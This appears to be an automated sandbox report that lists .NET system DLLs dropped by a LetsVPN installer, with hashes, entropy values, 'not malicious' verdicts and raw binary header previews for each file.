Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................n.....@..................................B..O....`..@................+...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(.....~....2r...p.(....B.....(.........R.....(...+%-.&(!...^.....("....(...+&~.....s$..."..s%.....(&........0......................

C:\Program Files (x86)\letsvpn\app-3.7.0\System.CodeDom.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	30184
Entropy (8bit):	6.332226298486135
Encrypted:	false
SSDEEP:	384:3dgrnDxt3942O1NEIY3lzZIcKBxehzsCtZ7U6r1fDXJx/WpuW04pwKANynsAw/9t:tgXxtu5jEIYDhzZpmWAw/KENAMxnxD
MD5:	02741B04DB92F7B05B348AFA6A3762DC
SHA1:	28BD58F1C25802E8DD3509DD12B480A601B24A56
SHA-256:	5E765817CE1728AA3C601ED29C3053F1D31F902843E927B466EB4A69BD6A3C5F
SHA-512:	02D3591509AA913A4AA4B6327F4F7D353665B0F01D3C96A9B2E58653BCC828757B2CD8ACD94905F8811936DC58C0BADB457566A6D55C19DB12724503B4A881B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dP'..........." ..0..>..........\... ...`....... ..............................Rf....`..................................[..O....`...............J...+...........[..T............................................ ............... ..H............text...0<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............H..............@..B.................\......H........#...)...........L.......Z.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(....*.(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Concurrent.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.954767949758013
Encrypted:	false
SSDEEP:	384:Lm2igOWnW8rWCfpwKANynsAw/98E9VF3AM+oagS7:bt6Aw/KENAMxY7
MD5:	FB02078309057452174BD0C682250F08
SHA1:	E8F475D956FE988F0D3B07D20C86F2D729707246
SHA-256:	0B80C0CC327DBB8CD142DA35FB4385C704DE0424ED3798E15ED23AAA13D71E4F
SHA-512:	8E3CE570069777B2CD9D33F6D9E4D3EEEA357C816ABE24C2E359A6CE3ABF55B28B4280C8DE4B3E00018366CAC01151B6D04F0F947F93F8F6701BDB5C325BE407
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................v.....@.................................t)..O....@..D................+...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.NonGeneric.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.949449681177467
Encrypted:	false
SSDEEP:	384:Jqnapn1iwwPWcGWeRpwKANynsAw/98E9VF3AM+ooMY6XX:nDu9Aw/KENAMxMy
MD5:	D3173DFEDA64755B2E88329BA521A801
SHA1:	50345FA89691566C305F6813E7F090063BB4B5CE
SHA-256:	A60CD3F791865B52A62F015E293A44FCEEC922618D06FE4AB1B90642D770F30D
SHA-512:	12BBF2474C13CC7CA99F9EFD8604F7CB6A3FCFB769B9B404AAFF148DDB6EB06D0B12F4014F0FBF1780CD78832A1CF66EA5D662DBF55D4993865DA35FD8003035
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................,....@.................................p)..O....@..@................+...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Specialized.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9572138486630015
Encrypted:	false
SSDEEP:	384:IHLaEav5aaUa6arWVLWm2pwKANynsAw/98E9VF3AM+oS8L:FPv5t/NOTAw/KENAMxR
MD5:	6D59D66B69AA9B2EBED4DF7EDB962A02
SHA1:	7A7DB5C892C23FDF7B2E8A6D7ED15BFF358E4A80
SHA-256:	BF99E4F0DCB690CAB2A19BA10401B945EB9C1D3C1171DE59C5494619EFD2E4FE
SHA-512:	15D74063B81295D72DC5D63A91C8EC948ABCB35A9476A6A82067B59E0B391ED6423D6985E687BCBF0F7FD2A993903E5875EB0AAB288E01FEBB15B964F68C0243
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..P................+...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.820783478949804
Encrypted:	false
SSDEEP:	384:I6iIJq56dOuWSKeWPMpwKANynsAw/98E9VF3AM+obtIiknXAt:SiAJAw/KENAMxbrka
MD5:	405227EDFB4BF10D916204FF66937B3F
SHA1:	7AF08E29C0A42FE772E121160A53F7EC97B5A77A
SHA-256:	2E474F101AA124959013BB256FAC2B846E56572F59AD39B3D43965BAFFE750B8
SHA-512:	36F448C12973B27356F0F660AC5DCBB52102D53D1E0226820319F541A90597D2F83C71086B1E6FEF31BACD43467C1C93A3D7F2682A7242C709CD8F5138BACFD8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0................. ...@....... ...............................w....@....................................O....@...................+...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H.......P ..\|....................(......................................BSJB............v4.0.30319......l.......#~..\|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k..............0....M...............................#..........x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Annotations.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38376
Entropy (8bit):	5.996055274986792
Encrypted:	false
SSDEEP:	768:iXDQsPurQcR3y6JOnSHDYFDhAw/KENAMxp5Fp/:izPtcE6JhHEFdAwrxp5X/
MD5:	CB0EA4B211367CC748B2279BE13B54AA
SHA1:	7C6A70C904520DACC1A7631B4AC22F085701FF6C
SHA-256:	BF4AC24D5C1A6A6E5A667BA039FFAF864D32C1BC2A32E91FF95FD817F747A20C
SHA-512:	F352E34D0E644166547B24316479870A3224F85C0DA4A596526590A6BA0AA242326AC503DCB9DDCBA22F63AF849C57E0787B8AF3E8C5C57A79327E11C0A0F20D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0..Z..........Bx... ........... ....................................@..................................w..O....................j...+..........8w............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............h..............@..B................"x......H........$...............R.. $...v......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(.....~....2r...p.(....2r=..p.(....2r}..p.(....2r...p.(....2r...p.(....2r%..p.(....2r]..p.(....2r...p.(....2r/..p.(....*2r...p.(...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.EventBasedAsync.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.868132034991061
Encrypted:	false
SSDEEP:	384:Enzz+MpSaLWW0+W71pwKANynsAw/98E9VF3AM+o0XbobU:ipuAAw/KENAMxZbU
MD5:	0795AA09694508A9B849DD0F6220B2D4
SHA1:	44577C0256DD688589A71BC86428E896997030A2
SHA-256:	7C77A2CC3F60EECA74965CF46F6DBDE0366FD92C8CAF6000310E0AA1BDB84206
SHA-512:	772926A6E60CD1ACF1F16154042BDF1A41EB26413E55BA1BC724D676C670551BBF8BF4422A7D876469F681C388468B39B17945A33BAADB58DC26EAAE48DB9A93
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B... ...@....... ..............................f ....@..................................)..O....@...................+...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.917233914321296
Encrypted:	false
SSDEEP:	384:8Ghr+YUfyHxsW/HWQBpwKANynsAw/98E9VF3AM+oMInWFQ:bkmiAw/KENAMx1R
MD5:	8A8189FDD8ADFEE4C9C72A5F5F41DC52
SHA1:	83FF3CED32D3C89E89F368D693AD012F23C39C76
SHA-256:	C38A47446F5E94DF13AB0CFACF52ACBC48734A127C4DF5511A286E2CEFD22409
SHA-512:	CD84259C1C937C54677D56C67A6AC4BB92F388C40D6FF1703098F8A54D32129A414EE37FDDFA7FCB57F652256B935DE456EBF6DFA9CE88FD9F95A1579C457347
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ..............................3.....@.................................<+..O....@..`................+...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.TypeConverter.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17896
Entropy (8bit):	6.852031215308936
Encrypted:	false
SSDEEP:	384:GRE+ruiA5vzWeNWM3pwKANynsAw/98E9VF3AM+ouAY/d:GS9bmAw/KENAMx1S
MD5:	3269A44986CE0A3BC21ADD533DBC126B
SHA1:	B0648BB683E2097FAEFE1A04657C656A2806576F
SHA-256:	CDA60B4E685C9A38A952492D2190F4A707EA92E548016C3D7E556E2F84EABE20
SHA-512:	79CD8E1EBE2AEBF66D2E619F79C9B094D265D203FCDACE29720D6BCBAB05C4A9B3156615478443434643FAA60FB5660D6531E7DADC2D556E42AFBC574B3B8A06
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ..............................K.....@................................../..O....@..p................+...`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.907876817777003
Encrypted:	false
SSDEEP:	384:GT+6ywnVvW0LWQTpwKANynsAw/98E9VF3AM+oTUgg:G99gAw/KENAMxwB
MD5:	E081AF9808BF9E38661C8B8F748C4A0A
SHA1:	5D66CAF0E62CBBDCAF1F9155A1EA63B6359A9D2D
SHA-256:	32D291F862EFF1DAA14B3B52C20CF36F8C5B876B728183648D8F877F8F4BA3DB
SHA-512:	4B4A9BDD2C255650D3E0E1C69A2971564E6AE0FC0F6745DF1F6A95A87FB02275796A32EDA3C63141331095D9224052F50E1D39AF8C6C5D7D6233FDFAD1F8BAF3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................4.....@..................................(..O....@...................+...`......\|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Configuration.ConfigurationManager.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	88040
Entropy (8bit):	5.415196096500198
Encrypted:	false
SSDEEP:	1536:m8KGCEPg1QqF3BhejEpvS/ZFQ+2/NVQ8GLa0Uh55T3lEC/IOPbZkxqN4bENZJlfq:RHCXBheNQ+2/NVQ8GLa0Uh55T3lEC/Ih
MD5:	5C09891E9DE673F0D5D58F44034EF52F
SHA1:	A62893EE5F31BFBB956EDB60D414BA696BFB60E8
SHA-256:	D6C1F1442A5D89C2E733386AA5D5E3401C3924BA5F314853C1E5A1CE53E5090E
SHA-512:	01C7DB3140348C9C10C7C23539177CC08CCA7DC1CBBFB9F68ABD26682493F5940EF2136972EF531BE61C1A5C25ED8B76681FD6473F4F1EA968030B75749ABE68
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.. ...........?... ...@....... ...............................u....`..................................>..O....@...............,...+...`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.....................@..B.................>......H....... ,..$...........D....}...=.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(....*.(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Console.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.905862991588053
Encrypted:	false
SSDEEP:	384:vRbzriaXT+WlEWfYpwKANynsAw/98E9VF3AM+oQCLP:J7icPAw/KENAMxJ
MD5:	B645DA6A1540BFBA62EC4B6DAD9FA792
SHA1:	45CCB792C8C8D31C21483AE4BB7942A413437B92
SHA-256:	DE3EE2A97E05E8F61FB7FDEB91D458E7F2133169ACA428BE22CD06F7969D856C
SHA-512:	0AA8FEF88FFC08FD46D514CBA45DFA9992BED3979158DB96032B8BE45AA4937BA1FCDACE9C773F4CE0DAFF322876F2CDC37B46B4B66ADBB33A8142D9E3AE70EC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ..............................Y.....@..................................(..O....@...................+...`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Common.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	149480
Entropy (8bit):	5.4418351122046
Encrypted:	false
SSDEEP:	3072:bdYO+3m9R6e1x03BZ6bDSzZ8B0uAP+ahvgs:V+2jv1x0ebezWiuAh/
MD5:	80A0654B888EA0DBA8D06E163F16ED46
SHA1:	EC28A96B46897B71CCB95E1E2526ACAA7D9D2238
SHA-256:	4EB9940AB807576C3517F931ADFC08BB9972C2AD4060E4C08EA7A3AB031B1F2E
SHA-512:	FBAA3A9F56B5296198B9AD424E785838990585DE83533A9FC172B9E6C90299D4ACEFF8D850B31C34EB9F9742452458D5F687125049F3C47E94B26D09308060D8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ..............................z.....@..................................,..O....@...................+...`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(....2r;..p.(....2ro..p.(....2r...p.(....2r...p.(....2r...p.(....2rK..p.(....2r...p.(....2r...p.(....2r...p.(....*2rM..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Odbc.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82920
Entropy (8bit):	5.955722981392787
Encrypted:	false
SSDEEP:	768:xsCikxiUPLkOWoYSAkm4fHLofFv9Rit9zzv5dnCsAw/KENAMxrr:qfkxBIOYSq4/2biHrnCsAwrxf
MD5:	BA2CFA75567673E1397EF4C057493F77
SHA1:	2644D80A1396D32F09FD86ED37C5CCBB62E41AC0
SHA-256:	C60AF1B42048C521DA3B0349487F9DBA1EFFCB239ED7B01CC9244F10D3587D0E
SHA-512:	F92235ABDF5B67F5C8A0CB60E0D7EFF3A4272CBA7D372D6BC9F421B6A3AA6185BA06B51E8A11937F973F99A702960C7D33B26C325356FCC7B8689396100AEAEF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............&... ...@....... ..............................Z.....`..................................)..O....@...................+...`.......(..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H........(...I..........0r..@...p(.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.OleDb.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	100840
Entropy (8bit):	5.813303359342085
Encrypted:	false
SSDEEP:	1536:5+kZKluk7ZFrtpAauVXrbtYC/xBu9LtAwrx517:5+kzk7p4rbtYC/xBOthx7
MD5:	170EA3B16CF6C6C6E0CB616B201A0CD8
SHA1:	A95CF1E662009221FD2E55A87A886A541F3B75B4
SHA-256:	EBC15C993AB195BEDA7C3DEB45AF05B0D305B20DFC91A3C75C20C89437F61E73
SHA-512:	38E30DF716189BD713D752B0E7C7C73E499640858DF50290D6F5D206AC6B075A849522F10A7E3AF0D88671DFBF41F5B3E796CBDAD001EEB9AC40B1A18A2D98C8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..R...........p... ........... ...............................\|....`..................................o..O....................^...+...........n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............\..............@..B.................o......H...........^..................Pn.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(....*.(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.SqlClient.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	224744
Entropy (8bit):	5.687717043673745
Encrypted:	false
SSDEEP:	6144:7XFpBZBJL3rBxad7/bAkGF60FhFoFmF8cjcsc4FEFbFgcbFmFiF6FhFuFBFuFDFb:bFRf60FhFoFmF8cjcsc4FEFbFgcbFmFb
MD5:	283E080CE74B5DB557AEE662ACB83FCA
SHA1:	7915F4CE008E5B33286BEBD3BF710D247ACE7FE1
SHA-256:	C45DECECE72A03B879F73FCE75A029464D0FE8A60DF22A48E673D9EA6814E6E7
SHA-512:	482552959E1A657EB66FB1DAEF7D6EB1C8E47A2F083F3B1B781E96847062888594DF2553A3BE0A6CB4A47E656093CC732A77899FF0958C380A09F53E9B2D8A31
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..8...........W... ...`....... ..............................9.....`..................................V..O....`...............B...+...........V..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H.......h7..............@...XW...U..........................................0..1.......(....,..%-.&...(.....o.......&...,...o....,.......................(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%....(..........(....

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Contracts.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.871006413324289
Encrypted:	false
SSDEEP:	384:cRtRWjYWVIpwKANynsAw/98E9VF3AM+onGJAIkEMB:eiNAw/KENAMxGJArpB
MD5:	C6EFBC9217E2463AF79A939C01DA034F
SHA1:	5C1D5404074AE8F850428A10D287DE4E0DB3F2BE
SHA-256:	50B7560179F923BFC03F8B631612D38679693FA4A48284D747D4857F6F93B7C2
SHA-512:	7D1697441ABEB6EF0F3FE24E4192277E798837ADEC88C5D7C9BC9082060A3F34FEC72765008C299AE9776B042B28CA2B84D14D681869E9B2B4772528E3C2B797
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0................. ...@....... ....................................@.................................x..O....@..@................+...`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.......................H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Debug.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9478091177944465
Encrypted:	false
SSDEEP:	384:CeWnoWW/pwKANynsAw/98E9VF3AM+oGliP8M:CnRAw/KENAMxjt
MD5:	D000CFD61AD9A1400F95BBBFE60FDAA8
SHA1:	09947705729C204091E141E0862675F8402476BE
SHA-256:	9B5FEEB0EA1A306F40A8B7F5D154F04089E11C2F11B15394CB98B7E460938C41
SHA-512:	5CFC6EFD29529E9D0E5F86E8B612BE9A164E1AF68D758993846BD8077E5B0FEA08CFFDC9609E133C5E9677AA12FAF1F8AB19886F78C6E7E0EBAAF274FE17FF10
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................j.....@.................................X)..O....@..$................+...`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.EventLog.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33768
Entropy (8bit):	6.351688012786698
Encrypted:	false
SSDEEP:	768:/VdeQes+wUTHP0G3cmL+7NQ1OaY74EaAw/KENAMxz5K:/XeQes+wUTHPbANP7taAwrxzc
MD5:	EAAEE00AAE6817EA36071A8763653842
SHA1:	CC040EF82512B69E77247AEA01816FE0C01969E4
SHA-256:	4AA9C121C565B4E4C0499FE3175E9FD6E812150275FEB9300F930C114651091F
SHA-512:	27C1CEA4FB5DA49BF055E86D3910DAD18BEB91D9B9314D396682F130F48FC6F76E61BF0D01723085DE6CA4FECEE14E867709BE950037891993E90E2E8C4FAEDA
Malicious:	false
